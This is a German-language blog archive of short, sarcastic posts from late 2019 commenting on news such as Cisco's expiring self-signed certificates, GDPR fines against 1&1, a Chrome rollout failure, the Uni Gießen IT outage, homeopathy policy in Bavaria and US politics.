Acetonperoxid ist, wie andere, ähnlich gebaute Peroxide, äußerst explosiv. Acetonperoxid-Kristalle sind generell nicht stabil, jederzeit können, etwa durch Temperatur- und Lichtunterschiede, Kristallbrüche entstehen, die zu einer Spontanexplosion führen. Trimeres Acetonperoxid sublimiert schon bei 14–18 °C, daher bilden sich bei Raumtemperatur in einem geschlossenen Gefäß im Bereich des Gefäßverschlusses schnell kleine Kristalle aus, die durch die Reibung beim Öffnen des Gefäßes zerbrechen und eine Explosion des Gefäßinhaltes auslösen.
Es ist völlig abwegig, dass Terroristen für einen Terroranschlag ausgerechnet dieses Zeug nehmen würden. Es wäre viel weniger riskant, bei einem Bauernhof Dünger zu klauen. Wenn euch die Dienste was von angeblich verhinderten Terroranschlägen mit Wasserstoffperoxis erzählen, dann lacht sie aus. ISIS weiß das und baut daher ihre Bomben aus Dünger + Diesel + Handy-Zünder.

Thu Dec 19 2019

[l] Setzt hier jemand Cisco-Geräte ein? Cisco ist aufgefallen, dass sie auf ihren Geräten self-signed X.509-Zertifikate haben, und die laufen zu Neujahr aus.
Ach naja, denkt ihr euch jetzt vielleicht, generiert man halt neue.
Da habt ihr die Rechnung ohne Cisco gemacht!
Self-signed X.509 PKI certificates (SSC) that were generated on devices that run affected Cisco IOS® or Cisco IOS XE software releases expire on 2020-01-01 00:00:00 UTC. New self-signed certificates cannot be created on affected devices after 2020-01-01 00:00:00 UTC. Any service that relies on these self-signed certificates to establish or terminate a secure connection might not work after the certificate expires.
LOOOOOL! Warte mal, gibt es nicht Leute, die Cisco einsetzen, weil sie deren Produkte für enterprise-fähig halten?
ZWEI WOCHEN VORHER fällt Cisco das auf? Und die verbleibende Zeit ist Weihnachten und Ferienzeit?
Geil!
Das gibt bestimmt eine IT-Apokalypse zum Jahreswechsel. In großen Firmen kannst du gar nicht mal eben deine Cisco-Geräte updaten. Da musst du erstmal ein Wartungsfenster beantragen. Das alleine dauert vier Wochen und du brauchst ein paar Monate Vorlauf, damit du die Leute warnen kannst. (Danke, Markus)

Thu Dec 12 2019

[l] Leserbrief zu Derivaten und Zahlen:
Weltbank: AktienHANDELSVOLUMEN 2018; 68.212 trillion - Hier geht es um den Jahresumsatz aller Transaktionen.
Das ZINSderivatevolumen Mitte 2019: 524 trillions - dies ist das ausstehende Nominalvolumen. Hier geht es nicht um die Transaktionen innerhalb eines Zeitraums. Wenn man all diese Derivate tatsächlich als Hedge betrachtet, dann sind damit Risiken oder Anlagen in Höhe von 524 trillions abgesichert. Um diese Derivate zu kaufen, müsste man jetzt den "gross market value", also den aktuellen Marktwert ausgeben in Höhe von 12,7 trillions. Das Volumen der Derivatetransaktionen ist wesentlich höher.
Meine Derivatezahlen stammen von der ISDA und geben als Quelle auch die BIS an. Hier die Zahlen der BIS. Die 12,7 trillions finde ich bei der BIS aber nicht in einer Zahl wieder.
Im Zusammenhang mit der Finanztransaktionssteuer machen natürlich Umsatzzahlen viel mehr Sinn, nur gibt es die leider nicht für die Derivate.
Die Mär vom Derviat als Hedge verkauft sich in der Öffentlichkeit zwar recht gut, aber in der Praxis befindet sich ein großer Teil dieser Derivate in Form von Zertifikaten oder strukturierten Anleihen. Viele nicht-öffentliche Hedge-Fonds sind nur in Derivaten investiert. Ich habe die Erfahrung gemacht, dass von den Investoren oft die Kosten für eine Absicherung gescheut werden, aber die Ertragschancen durch das Eingehen von zusätzlichen Derivate-Risiken gerne wahrgenommen werden. Insbesondere, wenn die Derivate in einem komplizierten, renditeträchtigen Produkt versteckt und somit nicht ohne weiteres erkennbar sind. Und selbst wenn jemand einen Hedge abschließt, gibt es dazu immer noch die Gegenseite des Derivategeschäfts, die entweder zufällig auch einen Hedge ergibt oder eben eine offene Position.
Die Aktienmarktzahlen von mir kann ich leider nicht in weiteren Quellen verifizieren. Da möchte ich nicht ausschließen, dass diese leider nicht korrekt sind.
Ihr seht schon: Das mit den vergleichbaren Zahlen ist nicht so einfach.

Wed Dec 11 2019

[l] Die US Army steigt jetzt in den Bergbau ein, weil sie seltene Erden für ihre Waffensysteme braucht und nicht von den Chinesen abhängig sein will.
Seltene Erden werden auch von allen anderen High-Tech-Firmen benötigt. Die kommen auch keineswegs nur in China vor, aber die Chinesen haben halt weniger Lohn und weniger Kosten für Bergbau-Absicherung, daher können die konkurrenzlos billig schürfen. Und als dann die anderen Länder alle dichtgemacht hatten, haben die Chinesen angesagt, dass sie ihre seltenen Erden eigentlich selber brauchen und nur noch einen kleinen Teil davon exportieren wollen.

Tue Dec 10 2019

[l] Wenn jemand noch Beweise brauchte, dass von Olaf Scholz nur pochierte Ochsenscheiße als Vorschlag kommt: Bitte sehr.
Personen, die Aktien großer Unternehmen kauften, sollen demnach künftig eine Steuer von 0,2 Prozent des Geschäftwertes an den Fiskus entrichten. Diese gelte aber nur für Aktien von Unternehmen, die mehr als eine Milliarde Euro wert sind.
Wie ... Aktien? Und auch nur von Milliardenkonzernen?!
Was ist denn mit Optionsscheinen? Hochfrequenzhandel? CDS und anderen Zocker"wert"papieren?
Da wird es euch nicht überraschen, dass das auch noch nicht mit den anderen EU-Ländern abgesprochen ist, die da mitmachen müssten. Das ist Olaf Scholz-Politik. Kommt viel zu spät, löst keines der Versprechen ein, und ist dann auch noch so ausgelegt, dass es nicht durchkommt bzw. in der Praxis keinerlei Auswirkungen haben wird.
Wer wählt eigentlich diese SPD immer? Haben die noch nicht genug kaputtgemacht?!
[l] Schlagzeile des Tages:
Australia’s democracy has been downgraded from ‘open’ to ‘narrowed’
Ja gut, das wird jetzt niemanden überraschen. Immerhin hat Australien dieses Jahr bei ihrem öffentlich-rechlichen Sender ABC eine Hausdurchsuchung gemacht. Und davor fielen sie dadurch auf, dass die Regierung der Privatwirtschaft Zugriff auf ihre Biometriedatenbank verkaufen wollten und durch den Betrieb von Kinderporno-Servern im Darknet durch die Polizei. Auch ihre Flüchtlingspolitik und ihr Verständnis von fairen Gerichtsverfahren sprechen eher nicht für eine offene Demokratie, ganz zu schweigen vom Krypto-Backdoor-Gesetz.
Aber deshalb habe ich das nicht verlinkt. Ich habe das verlinkt für den Anreißer, der das so wunderbar in Perspektive setzt:
Australia is now in line with the United States, Ghana and Botswana in terms of civil freedoms.
OH NEIN! Wir sind so schlimm wie Trumpistan?! Ghana und Botswana kann man noch verkraften, aber … die USA!?!? Wir müssen sofort handeln!!1!

Mon Dec 9 2019

[l] So langsam geht es los mit den Millionenstrafen für DSGVO-Verstöße: 1&1 muss knapp 10 Mio € Strafe wegen DSGVO-Verstoßes zahlen.
Der Telekommunikationsdienstleister, zu deren Töchtern etwa die Mail-Anbieter Web.de und GMX gehören, hatte Kelber zufolge "keine hinreichenden technisch-organisatorischen Maßnahmen" zum Schutz von Kundendaten ergriffen.
Ein Muster glaube ich erkennen zu können: Es geht nicht darum, Incidents zu bestrafen, also wenn was wegkommt, sondern es geht um schlechte Praktiken. Insbesondere geht es um schlechte Praktiken, wenn derjenige wusste, dass er Mist macht. Das erste Mal gibt es eine Verwarnung, dann gibt man ein bisschen Seil, und wer die Zeit nicht nutzt, der wird mit dem Seil erhenkt.
Wobei sich dieser Fall eher wie ein Gegenbeispiel dazu liest.
Nachdem die Instanz die ausgemachten Mängel angemahnt, zeigte sich 1&1 Kelber zufolge "einsichtig und äußerst kooperativ. In einem ersten Schritt habe der zu Drillisch gehörende Konzern zunächst den Authentifizierungsprozess durch die Abfrage zusätzlicher Angaben stärker abgesichert. Ferner werde derzeit nach Absprache mit der Aufsicht "ein neues, technisch und datenschutzrechtlich deutlich verbessertes Authentifizierungsverfahren eingeführt".
Die wurden also verwarnt und haben sofort reagiert aber haben dann trotzdem die Millionenstrafe reingedrückt gekriegt. Das bringt auch den Kelber ein bisschen in Erklärungsnot, aus der er sich wie folgt herauszuargumentieren versucht:
Trotz der raschen Anpassungen hielt Kelber es für geboten, die millionenschwere Geldbuße zu verhängen. Der Verstoß habe ein Risiko für den gesamten Kundenbestand dargestellt, begründet der Experte den Schritt. Die Höhe der Strafe bewege sich aufgrund des kooperativen Verhaltens von 1&1 im unteren Bereich des möglichen Bußgeldrahmens.
Ich hoffe mal, dass der Kelber da noch zurückrudert. Wo das DSGVO-Regime bisher wie eine sinnvolle Maßnahme zum Setzen von Anreizen und zum gemeinsamen Besserwerden aussah, kriegt es durch diese Strafe eher den Anstrich einer Willkür-Selbstbereicherungs-Profitcenter-Behörde. Gut, vielleicht zahlt 1&1 das auch mal eben aus der Portokasse. Dennoch riecht das meiner Ansicht nach so, als wollte ein Behördenleiter mal eben das Signal verbreiten, dass seine Behörde mehr als nur ein Parkplatz für anderswo zu inkompetente Sesselfurzer ist. Wen die Millionenstrafe konkret trifft, das war dann auch eher zweitrangig.
Update: 1&1 klagt gegen den Bußgeldbescheid. Finde ich in Ordnung. Mit der Aktion hat der Kelber glaube ich das Amt beschädigt.
[l] Infrastrukturapokalypse: Die Uni Gießen ist aus Sicherheitsgründen offline.
Die Justus-Liebig-Universität Gießen hat nach einem schwerwiegenden IT-Sicherheitsvorfall ihre Server aus Sicherheitsgründen heruntergefahren. Seit Sonntagmittag ist die Universität offline; Internet, E-Mail-Systeme und interne Netzwerke sind nicht nutzbar. Wegen des Verdachts auf einen Cyber-Angriff wird die JLU Strafanzeige stellen. Zur genauen Ursache der IT-Probleme können - auch mit Blick auf die laufenden Ermittlungen - derzeit keine Angaben gemacht werden.
OK dann muss ich wohl mal kurz in meine Glaskugel gucken. Die Chinesen waren's!!1! Die Uni Gießen hat versehentlich Huawei-5G-Equipment installiert!1!!

Wed Dec 4 2019

[l] Old and busted: E-Books gehen nicht mehr, weil der Publisher zugemacht hat.
New hotness: Videospiel geht nicht mehr, weil der Hersteller seine DRM-Lizenz nicht verlängert hat. Der Hersteller ist in diesem Fall Disney, das Videospiel ist Tron: Evolution, und das DRM ist SecuROM.
[l] Die gute Nachricht: Trump tut endlich was gegen die Massenarmut. Hunderttausende Amerikaner sind von Food Stamps abhängig, das sind so Gutscheine, mit denen man sich Nahrungsmittel kaufen gehen kann.
Die schlechte Nachricht: Nicht ganz so, wie ihr jetzt vielleicht gehofft hattet.
The Trump administration will announce a plan Wednesday to end food stamps benefits for about 750,000 Americans, issuing a new regulation that makes it harder for states to gain waivers from a requirement that beneficiaries work or participate in a vocational training program, according to people familiar with the matter.
Gut, da kann man jetzt als Deutscher nicht groß Kritik äußern, denn "Verpflichtung zur Zwangsarbeit oder Verhungern" ist bei uns ja schon länger Teil des menschenverachtenden Programms.
Was mich nur wundert: Solche Regelungen werden schon länger diskutiert. Die wurden bisher nicht gemacht, weil sie Trump-Wähler überproportional hart treffen würden.
Update: Es gibt sogar über 35 Mio Food Stamp-Empfänger in den USA, nicht nur ein paar Hunderttausend. Und das läuft heutzutage auch nicht mehr über Gutscheine sondern über so eine Art Prepaid Debit Card.

Sun Dec 1 2019

[l] Die schlechte Nachricht: Großbrand in Hallstatt im Salzkammergut in Österreich. Hallstatt ist Unesco-Weltkulturerbe.
Die gute Nachricht: China hat rechtzeitig ein dezentrales Backup gemacht.
Update: Hups, hatte die falsche URL gepastet.

Fri Nov 29 2019

[l] Forscher aus Israel haben E.Coli-Bakterien gefrankensteint, die sich statt von Zucker von dem CO2 aus der Luft ernähren.
Ich bin gerade hin- und hergerissen, ob ich mich freuen soll, weil das unsere Klimakatastrophe abwehren könnte, oder ob ich mir Sorgen vor einem Scifi-Dystopie-Szenario machen soll, wo wir die Bakterien nicht mehr gestoppt kriegen.
Update: Nachdem ihr hoffentlich alle die Primärquelle gelesen und bewertet hat, hier ein Leserbrief dazu:
CO2 ist ein recht energiearmes Gas, um daraus Biomasse aufzubauen (d. h. Bakterien leben und vermehren sich) muss Energie zugeführt werden. In dem Versuch hat man das über Formiate, d. h. Salze der Ameisensäure (chemich HCOOH) gemacht, also mit Zufuhr von organischem Kohlenstoff. Selbst wenn man chemisch / biologisch einen Weg zur CO2 Fixierung gefunden hat, bleibt das Fundamentalproblem bestehen: Die Energie, die bei der CO2 Freisetzung rausgekommen ist, muss wieder rein, zzgl. Verlusten an Wirkungsgrad.

Wed Nov 27 2019

[l] Ausrede des Tages: Haribo erklärt ihren Umsatzrückgang mit der SAP-Einführung.
Zusätzliche Probleme seien durch die Umstellung des Warenwirtschaftssystems auf SAP entstanden. Haribo habe hier die Komplexität der Umstellung unterschätzt. Dies habe zeitweise zu Lieferausfällen "bis zu zehn Prozent und darüber" geführt.
SAP hat ja auch schon ihren Teil für die Abrüstung der Bundeswehr getan, und hätte fast Lidl versenkt. Ich glaube ja, SAP ist sowas wie ein Gütesiegel. Wenn deine Firma eine SAP-Einführung überlebt, muss sie grundsolide Basiswerte haben und solide und krisenfest gemanaged sein. (Danke, Frank)

Fri Nov 22 2019

[l] Ihr kennt sicher alle das Milgram-Experiment. Dabei hat eine als Arzt verkleidete Autoritätsperson Probanden gesagt, sie sollten Dritten Stromstöße geben. Es ging darum, wie weit die den Strom hochdrehen würden, bevor sie sich weigern. Das Ergebnis war schockierend. Viele Probanden drehten die Elektrizität in tödliche Regionen, selbst als sie die Schmerzschreie hören konnten.
Daran musste ich denken, als ich diesen Artikel las. Da hat sich jemand als Arzt der Uni München ausgegeben und in Kleinanzeigen Menschen gesucht, die sich selbst (!) Stromschlägen aussetzen. Für die Wissenschaft. Er hat den Teilnehmern für die Teilnahme an der "Stromstudie" rund 2000 Euro in Aussicht gestellt. Die meisten seiner Opfer waren anscheinend Frauen.
Der wird jetzt wegen versuchten Mordes in 88 Fällen angeklagt.
Wir reden hier nicht von ein paar Batterien sondern von der Steckdose als Stromquelle.
Der Typ tat es anscheinend für seine sexuelle Befriedigung.
Was ich persönlich ja fast am krassesten finde: Teilweise haben da noch Freunde und Ehemänner mitgemacht und die Frauen für den Triebtäter irgendwo festgebunden für die Stromschläge.
"Wir brauchten das Geld einfach", sagt Janine H. am Donnerstag vor Gericht. Zehn Monate zuvor war ihr Sohn zur Welt gekommen. Ihr Mann war arbeitslos, das Geld knapp.
Der Mann wird gerade zum Altenpfleger ausgebildet.
Ihr Aufbäumen habe ihn erschreckt. Für einen Moment habe sie das Bewusstsein verloren. Es geht ihm noch heute sichtlich nah. "Hielten Sie den Stromschlag für potenziell lebensgefährlich?", fragt der Richter. "Nein", sagt der Mann.
Ich wusste ja, dass das Schulsystem am Abbauen ist. Aber dass die Leute nicht mehr wissen, dass Stromschläge aus der Steckdose lebensgefährlich sind, das kann ja wohl nicht wahr sein!

Wed Nov 20 2019

[l] Oh krass, jetzt kommen hier Mails rein, der Assange sei ja gar nicht unschuldig, der habe sich ja der Justiz entzogen.
Erstens: Die Schwedische Staatsanwaltschaft wollte ihn befragen, nicht verhaften. Einen Haftbefehl haben sie erst dieses Jahr haben wollen und abgelehnt bekommen, weil sie ihn ja auch in der Botschaft in London befragen konnten. Einer Befragung dort hatte Julian die ganze Zeit explizit zugestimmt. Und die Schweden am Ende auch. Da sprach also die ganze Zeit nichts dagegen.
Zweitens: Julian hatte sogar einer Auslieferung an Schweden für die Durchführung dieses Verfahrens zugestimmt — wenn sie ihm schriftlich zusichern, dass es keine Auslieferung an die USA gibt. Aber diese Zusage wollte Schweden nicht machen.
Drittens: Julian hat Beweise für seine Unschuld. Und es gab auch andere Indizien, dass es nicht um eine Vergewaltigung ging.
Man kann und sollte Julian Assange eine Menge vorwerfen. Wenn ihr sauer seid, dass die schwedische Staatsanwaltschaft fast eine Dekade lang zu inkompetent war, Julian zu befragen und daraus eine Anklage zu konstruieren und einen Haftbefehl zu beantragen, dann klärt das mit der schwedischen Staatsanwaltschaft. Da kann niemand anderes was für.
Und ehrlich gesagt bin ich echt schockiert von dieser Kultur des "es gibt einen Verdacht, also lynchen wir ihn" da draußen. Ihr erinnert mich alle an Otto Schily und Wolfgang Schäuble und ihre "Gefährder präventiv festnehmen"-Pläne. Die ja in Bayern jetzt aktives Recht sind. Das ist genau das, was ihr gerade für Julian fordert! Verfahren? Pah! Wer braucht Verfahren! Ich finde, der da drüben sie aus wie ein Gefährder, ab in den Knast mit dem!
Habt ihr euch mal überlegt, was passiert, wenn die AfD mal irgendwo an die Macht kommt? Und deren Innenminister dann findet, dass ihr wie Gefährder ausseht, und euch auf die Liste der Leute tut, die mal für die Volkssicherheit interniert gehören?
Das hat schon einen Grund, dass unser Rechtssystem vorsieht, dass man erst nach einem ordentlichen Verfahren, der Würdigung aller Fakten und einer rechtskräftigen Verurteilung bestraft wird!
Die Energie, mit der ihr im Internet herumhetzt, die solltet ihr mal lieber dafür einsetzen, dass die ganzen widerwärtigen Polizeigesetze zurückgerollt werden, bevor irgendwo die AfD übernimmt. Meiner Meinung nach sind die auch jeder anderen Regierung unwürdig. Ich traue ganz sicher auch keiner CDU- oder SPD-Regierung genug, um ihrer Exekutive solche Befugnisse zu geben.
Update: So, sorry, das schrieb ich gestern abend nach einem Glas Rotwein. Mit dem Seitenhieb auf Bayern meinte ich den Mollath. Und die Frage stellt sich mir wirklich: Hat von euch Internet-Hasspredigern wirklich keiner beim Fall Mollath die Empathie gehabt, sich zu überlegen, wie sich das anfühlen würde, wenn die das nicht mit dem sondern mit euch gemacht hätten?!
Ihr redet immer von Faschismusbekämpfung, aber dann baut ihr zur Bekämpfung der Faschisten selber den faschistischen Polizeistaat auf. Meine Methode zur Faschismusbekämpfung ist ja, denen einen unattraktiven Staat zu hinterlassen, der es auch Faschisten in der Regierung nicht ermöglicht, ihre faschistischen Ideen umzusetzen. Ein Staat mit ordentlicher Gewaltenteilung, wo die Exekutive wieder nur exekutiert und nicht selber Dinge bestimmt. Eine Judikative, die weniger Angst hat, verfassungsfeindliche Gesetze wegzuschießen. Ein Parlament, dass nicht so viele Gesetze beschließt, dass nicht genug Zeit ist, um die alle zu debattieren, und das nicht in Nacht- und Nebel-Aktionen Gesetze durchwinkt, regelmäßig auch tagsüber mit so wenig Teilnehmern, dass bei einer AfD-Trolling-Aktion sofort offensichtlich runtergefahren werden muss, weil der Laden schon rein formal nicht beschlussfähig ist. Wenn wir hier eine Demokratie aufbauen, die den Namen auch verdient, dann müssen wir uns auch vor keinen Extremisten fürchten. Aber bis wir da sind, müssen wir erstmal eine Reihe von Gesetzen zurückbauen. Staatstrojaner, die ganzen Einschränkungen für das Versammlungsrecht, Abhörbefugnisse, Einschränkungen des Briefgeheimnisses, das Wegsperren von Unschuldigen ("Gefährder"). Die Liste ist lang. Solange ihr nicht gegen den ganzen Scheiß laut opponiert, verdient aus meiner Sicht keiner von euch den Titel Antifaschist.

Mon Nov 18 2019

[l] Lacher des Tages: Michael Bloomberg will Präsident werden. Bloomberg ist Milliardär, war Bürgermeister von New York und ist der Eigentümer von bloomberg.com und diesen Info-Terminals für Börsenzocker. Und der will jetzt anscheinend für die Democrats Präsidentschaftskandidat werden — angekündigt ist aber noch nichts.
Nun gibt es da einen klitzekleinen Interessenskonflikt zwischen seiner Zeit als Bürgermeister, wo er knallharte Law&Order-Politik mit "Stop & Frisk" gemacht hat, und der Tatsache, dass die davon betroffenen dunkelhäutigen Minderheiten der zentrale Wählerstamm der Democrats sind.
Und so haben wir jetzt einen der super-seltenen Fälle, wo sich ein Law&Order-Arsch für seine Politik entschuldigt.

Sat Nov 16 2019

[l] Und jetzt zum Wetter.
Mallorca eröffnet die Skisaison.
Venedig eröffnet die Badesaison.
Gut, dass der Klimawandel ein chinesischer Hoax ist, sonst müsste man langsam anfangen, sich ernsthaft Sorgen zu machen.
Update: Passend dazu:
Veneto regional council, which is located on Venice's Grand Canal, was flooded for the first time in its history on Tuesday night — just after it rejected measures to combat climate change.
Ja komm, das betrifft uns ja hier in Venedig auch nicht. Außerdem ist das ja vielleicht gar nicht menschengemacht, und daraus folgt ja wohl sonnenklar, dass der Mensch auch nicht seinen Teil des CO2-Ausstoßes senken darf. Das wäre ja ein Eingriff in die Natur!!1!

Fri Nov 15 2019

[l] Wisst ihr, wieso das schon OK ist, wenn Polizei und Innenministerium mehr Befugnisse kriegen? Weil die das nie missbrauchen würden!
Im Amri-Untersuchungsausschuss hat ein Ermittler eine brisante Aussage gemacht: BKA und Innenministerium sollen einen V-Mann mundtot gemacht haben, der Informationen zu dem Attentäter hatte.
Das sind doch genau die Art von Leuten, denen man Befugnisse wie den Staatstrojaner die Hand geben will!!1!
[l] Chrome hat ein Experiment in die Produktion ausgerollt, das dort geplatzt ist. Das platzt nur in Terminal-Server-Umgebungen, wie sie in ranzigen Enterprise-Umgebungen verbreitet sind.
Stellt sich raus: Wenn man das Testing an Freiwillige crowdsourced, sind die Teilnehmer nicht aus dem Enterprise-Bereich. So segelte der Code ohne Probleme durch Monate des Testens.
Und jetzt merken plötzlich alle, wie sehr sie sich von Chrome abhängig gemacht haben.
"This has had a huge impact for all our Call Center agents and not being able to chat with our members," someone with a Costco email address said in a bug report. "We spent the last day and a half trying to figure this out."
"Our organization with multiple large retail brands had 1000 call center agents and many IT people affected for 2 days. This had a very large financial impact," said another user.
"Like many others, this has had significant impact on our organization with our entire Operations (over 500 employees) working in a RDS environment with Google Chrome as the primary browser," said another system administrator.
"4000 impacted in my environment. Working on trying to fix it for 12 hours," said another.
"Medium sized call center for a local medical office lost a day and a half of work for 40-60 employees," added another.
Auf der anderen Seite muss man sagen, dass bei Chrome erstaunlich wenig schiefgeht. Wenn man das mal mit den ganzen verkackten Windows-Patches vergleicht, ist Chrome geradezu ein Anker der Stabilität und Verlässlichkeit.
Update: Zur Klarstellung: Die Firmen haben das getestet und Chrome war erfolgreich im Einsatz, aber der Autoupdater von Chrome hat halt eines Tages diesen Experimentalcode ausgerollt, und ein "mach mal das letzte Update rückgängig" gibt es bei Chrome nicht.

Thu Nov 14 2019

[l] Leserbrief zum aktuellen Waffennarr-Fall:
Für mich ein klarer Fall von "guckt mal, wie sehr wir bemüht sind". Man sieht auf den Fotos auf den ersten Blick, dass die Magdeburger Polizei lediglich ein Privatmuseum ausgehoben hat: Die Modellhaftigkeit der Wympel R-60 sieht ein Blinder mit dem Krückstock. Im Transporter der Polizei: leere Kartuschen, leere Granaten mit entfernten Zündern… - nur Schrott.
Aber nach deutschem Recht fallen auch Waffenteile unter das Kriegswaffenschutzgesetz, wie z.B. der MG-Lauf in der Wanne, sofern nicht unbrauchbar gemacht (zugeschweißt).
Demnächst pflücken die irgendwo die verrotteten Reste einer MIG-21 aus Brombeerhecken:
"Schwerer Schlag gegen Naziterror: Polizei stellt sowjetischen Bomber sicher!"
Mich erinnert sowas immer an diese Pressefotos, auf denen das halbe, ordenbehängte Polizeipräsidium hinter einem Tisch posiert, auf dem ein Töpfchen mit einem 5 cm hohen Hanfpflänzchen, ein Tütchen mit 2 g Gras und, damit's nicht ganz so leer aussieht, eine halbleere Packung Tabak, große Papers, zwei Wasserpfeifen und fünf Feuerzeuge liegen.
Bildunterschrift:"Großer Schlag gegen Drogenbande. Polizei nimmt Hanfplantage hoch"

Tue Nov 12 2019

[l] Habt ihr das auch gehört? Der Altmeier hat Windkraft in Deutschland kaputtgemacht?
Stellt sich raus: Stimmt gar nicht. Da ging noch was!
Windräder sollen mindestens 1000 Meter von Wohnsiedlungen entfernt stehen - so hatte es die Koalition beschlossen. Nun wird klar: Für das Wirtschaftsministerium reichen dazu bereits fünf Häuser, die zusammenstehen.
Warum kann die CDU nicht mal in eine positive Richtung ganze Arbeit leisten?

Sat Nov 9 2019

[l] Und noch ein Leserbrief zu Heilpraktikern:
Heilpraktiker unterstehen deshalb der Aufsicht des Innenministeriums und nicht der des Gesundheitsministerium, weil damit deutlich gemacht wird, daß es sich nicht um Gesundheitspflege, sondern um Gefahrenabwehr handelt. Die abzuwehrende Gefahr ist der Heilpraktiker, nicht die Krankheit! Das war übrigens, anders als Deine anderen Quellen behaupten, auch von den Nazis schon beabsichtigt. Dementsprechend wird in der Heilprakterprüfung auch nicht irgendeine Heilkompetenz überprüft, sondern nur, ob der/die Geprüfte weiß, wann es Zeit für einen Arzt ist.
Dementsprechend gehört die Homöopathie konsequent in die Hände des Heilpraktikers und nicht des Arztes. Allerdings ist wissenschaftlich hinreichend nachgewiesen, daß auch Hokuspokus aller Art (und das ist Homöopathie) die Gesundwerdung fördern kann (siehe Placebo-Effekt), weil Menschen aus (manipulierbarer) Psyche und Körper bestehen und beides nicht voneinander getrennt werden kann. Insofern hat auch Hokuspokus aller Art eine gewisse Daseinsberechtigung, solange es dem Patienten nicht schadet (Gefahrenabwehr!).
In welcher Höhe Hokuspokus aller Art von den Kassen vergütet werden sollte, ist eine ganz andere Frage.
Ich wollte mich gerade darüber lustig machen, dass man mit der Argumentation ja auch die Nazis und Terroristen dem Innenministerium unterstellen müsste, aber das Lachen ist mir im Halse steckengeblieben.
Update: Der Leserbriefschreiber schickt noch ein paar Links hinterher: LTO zur Geschichte, Abs 1 Buchstabe i beinhaltet die Gefahrenabwehr, stellvertretend für andere Bundesländer Ziffer 4.2 der Regelung aus Bayern schreibt auch recht deutlich, dass es nicht darum geht, dass der Heilpraktiker irgendjemandem hilft, sondern nur darum, dass er keinen Schaden anrichtet.

Fri Nov 8 2019

[l] Also an manchen Tagen merkt man echt nochmal extra deutlich, dass dieser Realitätszweig nicht für den Produktivbetrieb gedacht war.
Es geht los mit Boris Johnson.
“Northern Ireland has got a great deal. You keep free movement. You keep access to the single market.”
Da hörste doch das Sitcom-Publikumsgelächter im Hinterkopf! GREAT DEAL! You get to keep what you have now!! Wenn das ein great deal ist, was ist denn dann das, was der Rest von UK kriegt?
Und dann Diese unglaubliche Meldung. Wegen US-Sanktionen droht der PCK-Raffinerie in Schwedt eine Betriebsdrosselung oder gar Abschaltung. Warum? Festhalten, das ist absurd.
Stellt sich raus: Die Raffinerie gehört Rosneft, also den Russen. Das ist ja schonmal ein Großausschlag auf der WTF-Skala, dass Deutschland eine Raffinerie (das ist sowas wie die Lizenz zum Gelddrucken!) an die Russen verscheuert. Aber gut.
Die Amis haben wegen Nord Stream 2 Sanktionen gegen die Russen angekündigt. Mit der hat diese Raffinerie natürlich nichts zu tun, denn das ist eine Gaspipeline und eine Raffinerie raffiniert Rohöl, nicht Gas. Aber das ist die Begründung für die Sanktionen. Ausschlag zwei auf der WTF-Skala, dass die USA Deutschland mit Sanktionen gegen Russland schaden, wegen einer russischen Pipeline durch Polen. Nichts davon hat irgendeinen US-Bezug. Was bilden die sich eigentlich ein!?
Wartet, wird noch absurder. Das Leitwerk der Raffinerie ist von einer US-Firma. Und die Bauer der Raffinerie haben sich da (Digitale Souveränität lässt grüßen) vollständig abhängig gemacht. Ohne ständige Duldung und Knöpfchen-Gedrückt-Halten der US-Firma läuft die Raffinerie nicht. Das ist Ausschlag 3 auf der WTF-Skala. Wer baut denn bitte eine so teure und wichtige Anlage und macht sich dann komplett von einem Drittland abhängig, ohne deren Placet das Ding nicht läuft. Sind die alle bekloppt?!
Jetzt haben wir den Täter, das Motiv und das Tatwerkzeug. Aber ich sehe hier noch einen WTF-Ausschlag. Wieso kauft denn ausgerechnet Russland eine Raffinerie, die ausgerechnet von den Amerikanern so vollständig fremdkontrolliert wird?!
Daher komme ich jetzt ins Grübeln. Die Deutschen halte ich sofort für so dämlich, aber die Russen stellen sich normalerweise nicht so blöde an. Ich frage mich jetzt, ob die Russen vielleicht die Raffinerie gekauft haben, damit Deutschland von US-Sanktionen der Amis betroffen sind, und nicht mehr einen auf "nicht unser Problem, handelt ihr das mal aus" machen können.

Thu Nov 7 2019

[l] Gute Nachrichten: Der Bayerische Landtag tut endlich was gegen multiresistente Keime.
Was sie tun? Nun, eine Homöopathiestudie.
Was gibt es da noch zu studieren, fragt ihr?
Mit einer medizinischen Studie soll die Staatsregierung klären, ob durch homöopathische Mittel der Einsatz von Antibiotika reduziert werden kann.
Jetzt wollt ihr bestimmt wissen, welche Parteien sich da so wunderbar zum Stück Brot gemacht haben. Hier:
Dies hat der Landtag am Donnerstag mit den Stimmen der Regierungsfraktionen von CSU und Freien Wählern beschlossen.
Gut, das wird jetzt wahrscheinlich niemanden verwundern, dass die CSU Wissenschaft nicht erkennen würde, wenn sie versehentlich gegen liefe. Aber ist schon lustig, weil die CSU ja keine Gelegenheit auslässt, Bayern als Wissenschaftsstandort zu feiern und sich dafür die Medaillen umzuhängen.
Update: Auch mit den Stimmen der Grünen (Keine Gegenstimmen, 3 Enthaltungen). Das fand die SZ wohl nicht erwähnenswert, weil bei den Grünen niemand Wissenschaftsnähe vermutet hatte. Nun, immerhin beantwortet das diese Frage.
Update: Ein Leser schickt noch ein paar schmackhafte Zitate aus dem Sitzungsprotokoll:
Susann Enders (FREIE WÄHLER): "Meine Damen und Herren, hören Sie auf, auf die Homöopathen einzuprügeln. Lassen Sie doch endlich Schulmedizin und Homöopathie auf Augenhöhe wirken."
[...]
Klaus Holetschek (CSU): "Natürlich vertrauen wir der Wissenschaft. Sie wissen aber auch, dass evidenzbasierte Medizin und doppelblind randomisierte Studien nicht immer günstig und bei Naturheilverfahren wie klassischen Verfahren auch nicht immer möglich sind. Trotzdem helfen Naturheilverfahren und alternative Medizin. Wir müssen auch einmal wieder auf die traditionelle Medizin setzen. Wir müssen auf Hausmittel und auch auf Volkskunde setzen. Das sind Dinge, die helfen können."
(Prof. Dr. Ingo Hahn (AfD): Auf die Volkskunde? – Heiterkeit bei der AfD)
*speih*

Sat Nov 2 2019

[l] Trump hat ja gerade ein Impeachment am Bein, weil ein fieser Whistleblower bekannt gemacht hat, was er der Ukraine am Telefon so für unlautere Vorschläge gemacht hat.
Die Republikaner haben jetzt den Namen des Whistleblowers öffentlich gemacht, vermutlich in der Hoffnung, ein verwirrter Einzeltäter könnte einen bedauerlichen Amoklauf machen und dabei könnte der umkommen.
Wie das so ist in der Politik. Immer wenn du denkst, der Boden ist erreicht, gräbt jemand noch tiefer.

Tue Oct 29 2019

